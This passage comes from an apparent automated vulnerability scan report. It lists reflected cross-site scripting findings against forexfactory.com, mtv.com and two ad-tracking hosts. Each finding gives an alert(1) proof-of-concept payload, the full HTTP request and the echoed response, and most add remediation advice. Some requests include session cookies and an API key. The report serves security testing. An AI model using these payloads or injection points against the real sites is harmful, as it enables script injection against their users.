Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:27:59 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:27:59 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 68020

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<a href=\"#\" style=\"white-space: nowrap; color: #FFFFFF927e6\\";alert(1)//62c8519a6c1;\">
...[SNIP]...

3.39. http://www.forexfactory.com/excal.php [colors[8] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The value of the colors[8] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca0b3\"%3balert(1)//7fd3c255b13 was submitted in the colors[8] parameter. This input was echoed as ca0b3\\";alert(1)//7fd3c255b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /excal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=ca0b3\"%3balert(1)//7fd3c255b13&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; __utmz=113005075.1308052959.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113005075.1431033565.1308052959.1308052959.1308052959.1; __utmc=113005075; __utmb=113005075.1.10.1308052959

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:28:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:28:10 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:28:10 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67822

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<tr class=\"eventRow\" id='timeoptions' style=\"display: none; color: ca0b3\\";alert(1)//7fd3c255b13;\">
...[SNIP]...

3.40. http://www.forexfactory.com/ws_cal.php [colors[2] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /ws_cal.php

Issue detail

The value of the colors[2] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b9b\"%3balert(1)//33ca1322ece was submitted in the colors[2] parameter. This input was echoed as 26b9b\\";alert(1)//33ca1322ece in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ws_cal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000&colors[1]=%230B198C&colors[2]=%23d1d1e126b9b\"%3balert(1)//33ca1322ece&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:07:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:07:57 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67984

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<td class=\"dateHeading\" colspan=\"9\" style=\"border-bottom: 1px solid #d1d1e126b9b\\";alert(1)//33ca1322ece;\" width=\"100%\">
...[SNIP]...

3.41. http://www.forexfactory.com/ws_cal.php [colors[4] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /ws_cal.php

Issue detail

The value of the colors[4] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cff61\"%3balert(1)//59731740299 was submitted in the colors[4] parameter. This input was echoed as cff61\\";alert(1)//59731740299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ws_cal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFFcff61\"%3balert(1)//59731740299&colors[6]=%23FFFFFF&colors[8]=%23000000&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:06:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:06:19 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67744

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<a href=\"#\" style=\"white-space: nowrap; color: #FFFFFFcff61\\";alert(1)//59731740299;\">
...[SNIP]...

3.42. http://www.forexfactory.com/ws_cal.php [colors[8] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /ws_cal.php

Issue detail

The value of the colors[8] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfe41\"%3balert(1)//5fae3ef9ef8 was submitted in the colors[8] parameter. This input was echoed as cfe41\\";alert(1)//5fae3ef9ef8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ws_cal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000cfe41\"%3balert(1)//5fae3ef9ef8&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:07:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:07:07 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67864

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<tr class=\"eventRow\" id='timeoptions' style=\"display: none; color: #000000cfe41\\";alert(1)//5fae3ef9ef8;\">
...[SNIP]...

3.43. http://www.mtv.com/games/arcade/game/play.jhtml [arcadeGameId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /games/arcade/game/play.jhtml

Issue detail

The value of the arcadeGameId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d53"><script>alert(1)</script>9c033e45818 was submitted in the arcadeGameId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /games/arcade/game/play.jhtml?arcadeGameId=10325912c9d53"><script>alert(1)</script>9c033e45818 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012600|check#true#1308010800; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: 71a676dc24ad738496eca8b5e2b43ab6
Vary: Accept-Encoding
Cache-Control: max-age=573
Date: Tue, 14 Jun 2011 00:19:25 GMT
Content-Length: 15890
Connection: close

<error>No Data</error>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" x
...[SNIP]...
<script type="text/javascript" src="/sitewide/scripts/reportIMX.jhtml?arcadeGameId=10325912c9d53"><script>alert(1)</script>9c033e45818">
...[SNIP]...

3.44. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /global/music/scripts/reportFluxView.jhtml

Issue detail

The value of the uri request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76933'%3balert(1)//6a994bac4ef was submitted in the uri parameter. This input was echoed as 76933';alert(1)//6a994bac4ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/music/scripts/reportFluxView.jhtml?uri=mgid:cms:item:mtv.com:1032591276933'%3balert(1)//6a994bac4ef HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 8b8896d1e8baa4e52a4cb67abcf72b
Last-Modified: Tue, 14 Jun 2011 00:19:32 GMT
Content-Type: application/x-javascript
Content-Length: 597
Cache-Control: max-age=86386
Date: Tue, 14 Jun 2011 00:19:32 GMT
Connection: close
Vary: Accept-Encoding

var reportUri = "mgid:cms:item:mtv.com:1032591276933';alert(1)//6a994bac4ef";

if (reportUri.indexOf("photolist") != -1) {
reportUri = reportUri.substring(reportUri.lastIndexOf(":") + 1);

if (document.referrer.indexOf(reportUri) == -1)
MTVN.Reporting.reportFluxView('http://t.flux.com/tracking.gif?CMU=D3FCFFFF0002D51D0002FFFFFCD3&CUR=mgid:cms:item:mtv.com:1032591276933';alert(1)//6a994bac4ef&WN=ContentView');
}
else
MTVN.Reporting.reportFluxView('http://t.flux.com/tracking.gif?CMU=D3FCFFFF0002D51D0002FFFFFCD3&CUR=mgid:cms:item:mtv.com:1032591276933';alert(1)//6a994bac4ef&WN=ContentView');
...[SNIP]...

3.45. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /global/music/scripts/reportFluxView.jhtml

Issue detail

The value of the uri request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3919"%3balert(1)//d2192e09569 was submitted in the uri parameter. This input was echoed as d3919";alert(1)//d2192e09569 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/music/scripts/reportFluxView.jhtml?uri=mgid:cms:item:mtv.com:10325912d3919"%3balert(1)//d2192e09569 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 5014b291ce7f542c23c5819d4bdabeb
Last-Modified: Tue, 14 Jun 2011 00:19:32 GMT
Content-Type: application/x-javascript
Content-Length: 597
Cache-Control: max-age=86296
Date: Tue, 14 Jun 2011 00:19:32 GMT
Connection: close
Vary: Accept-Encoding

var reportUri = "mgid:cms:item:mtv.com:10325912d3919";alert(1)//d2192e09569";

if (reportUri.indexOf("photolist") != -1) {
reportUri = reportUri.substring(reportUri.lastIndexOf(":") + 1);

if (document.referrer.indexOf(reportUri) == -1)
MTVN.Reporting.reportFluxView('http://t
...[SNIP]...

3.46. http://www.mtv.com/sitewide/scripts/reportIMX.jhtml [arcadeGameId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /sitewide/scripts/reportIMX.jhtml

Issue detail

The value of the arcadeGameId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf21f'%3balert(1)//25ce7a73533 was submitted in the arcadeGameId parameter. This input was echoed as cf21f';alert(1)//25ce7a73533 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitewide/scripts/reportIMX.jhtml?arcadeGameId=10325912cf21f'%3balert(1)//25ce7a73533 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: d1ae8408bccac9b42438b17c11806e
Last-Modified: Tue, 14 Jun 2011 00:19:33 GMT
Content-Type: application/x-javascript
Content-Length: 333
Cache-Control: max-age=86389
Date: Tue, 14 Jun 2011 00:19:33 GMT
Connection: close
Vary: Accept-Encoding

if(typeof MTV.Reporting.reportIMX == "function"){
var reportIMX = MTV.Reporting.reportIMX;

reportIMX('http://imx.mtv.com/sitewide/droplets/view_gen.jhtml?itemUrl=cms_item%3A%2F%2Fwww.mtv.com%2F10325912cf21f%27%3Balert%281%29%2F%2F25ce7a73533&tagParams=tag_action%3Dviewed%26', 'cms_item', '10325912cf21f';alert(1)//25ce7a73533');

}

3.47. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fa9fc<script>alert(1)</script>664cb18f463 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: fa9fc<script>alert(1)</script>664cb18f463
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=...[SNIP]...

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:17:01 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: fa9fc<script>alert(1)</script>664cb18f463

3.48. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 33f3f<script>alert(1)</script>1e9269f0574 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=133f3f<script>alert(1)</script>1e9269f0574

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

